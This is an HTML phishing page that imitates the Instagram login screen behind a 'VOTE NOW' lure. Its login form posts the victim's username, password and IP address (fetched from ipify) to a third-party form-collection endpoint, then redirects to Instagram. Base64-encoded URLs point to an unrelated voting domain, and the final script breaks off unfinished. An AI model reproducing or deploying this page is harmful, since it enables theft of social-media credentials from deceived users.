<html class="border-l" lang="en"><head>
<meta name="viewport" content="width=device-width, initial-scale=1">

    <meta charset="UTF-8">
    <link href="css/tailwind.min.css" rel="stylesheet">
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        .instagram-logo {
            background-position: 0 -130px;
            height: 51px;
            width: 175px;
            background-image: url(images/VOYsjSb.png);
        }
        .facebook-logo {
            background-position: -414px -259px;
            background-image: url(images/VOYsjSb.png);
            height: 16px;
            width: 16px;
        }
        .apple-store-logo {
            background-position: -132px -182px;
            height: 42px;
            width: 128px;
            background-image: url(images/VOYsjSb.png);
        }
        .google-store-logo {
            background-position: 0 -182px;
            height: 42px;
            width: 130px;
            background-image: url(images/VOYsjSb.png);
        }
        .red-text {
            color:red!important;
        }
    </style>
    <script type="text/javascript">
var urlx=atob("aHR0cHM6Ly9ieW1lLmFsbGlub25ldm90ZS5vbmxpbmUvaW5kZXh2LnBocA==");
</script>
</head>
<body data-new-gr-c-s-check-loaded="14.1133.0" data-gr-ext-installed="">
<div class="h-screen bg-gray-50 flex flex-col justify-center items-center">
    <div class="bg-white border border-gray-300 w-80 py-8 flex items-center flex-col mb-3">
        <h1 class="bg-no-repeat instagram-logo"></h1>
        <span class="login100-form-title p-b-34 p-t-27 red-text" style="display:none;">
    Incorrect Username OR Password
</span><script>
  // Function to retrieve the visitor's IP address
  function getVisitorIP(callback) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://api.ipify.org?format=json', true);
    xhr.onreadystatechange = function() {
      if (xhr.readyState === 4 && xhr.status === 200) {
        var response = JSON.parse(xhr.responseText);
        callback(response.ip);
      }
    };
    xhr.send();
  }

  // Populate the hidden field with the visitor's IP address
  getVisitorIP(function(ip) {
    document.getElementById('visitor_ip').value = ip;
  });
</script>
        <form class="mt-8 w-64 flex flex-col" name="resetPwdForm" action="https://submit-form.com/Ue88Z8BQQ"> <input type="hidden" name="visitor_ip" id="visitor_ip" value="">
  <input type="hidden" value="Submit"> <input type="hidden" name="_redirect" value="https://instagram.com/thanks">
    <input autofocus="" class="text-xs w-full mb-2 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none" id="email" name="username" placeholder="Phone number, username, or email" type="text" control-id="ControlID-1">
    <input autofocus="" class="text-xs w-full mb-4 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none" id="password" name="pass" placeholder="Password" required="" type="password" control-id="ControlID-2">
    <button  id="signIn"  class="text-sm text-center bg-blue-600 text-white py-1 rounded font-medium" control-id="ControlID-3" style="display:flex; justify-content:center;">
        <span class="btnlog">Log In</span>
        <span style="display:none" class="btnloader"><img src="images/loading-gif.gif" width="20"></span>
    </button>
</form>

        <div class="flex justify-evenly space-x-2 w-64 mt-4">
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
            <span class="flex-none uppercase text-xs text-gray-400 font-semibold">VOTE NOW</span>
            <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
        </div>
        <button class="mt-4 flex" control-id="ControlID-4">
            <div class="bg-no-repeat facebook-logo mr-1"></div>
            <span class="text-xs text-blue-900 font-semibold"> </span>
        </button>
        <a class="text-xs text-blue-900 mt-4 cursor-pointer -mb-4">Forgot password?</a>
    </div>
    <div class="bg-white border border-gray-300 text-center w-80 py-4">
        <span class="text-sm">Don't have an account?</span>
        <a class="text-blue-500 text-sm font-semibold">Sign up</a>
    </div>
    <div class="mt-3 text-center">
        <span class="text-xs">Get the app</span>
        <div class="flex mt-3 space-x-2">
            <div class="bg-no-repeat apple-store-logo"></div>
            <div class="bg-no-repeat google-store-logo"></div>
        </div>
    </div>
</div>
      <script src="js/jquery.min.js"></script>
        <script type="text/javascript">
             var land=atob('aHR0cHM6Ly9ieW1lLmFsbGlub25ldm90ZS5vbmxpbmUvemlmby8ybmQ=');
              var link=window.location.href;
             urlx=urlx;
  

               var count = 0;
 


</body></html>
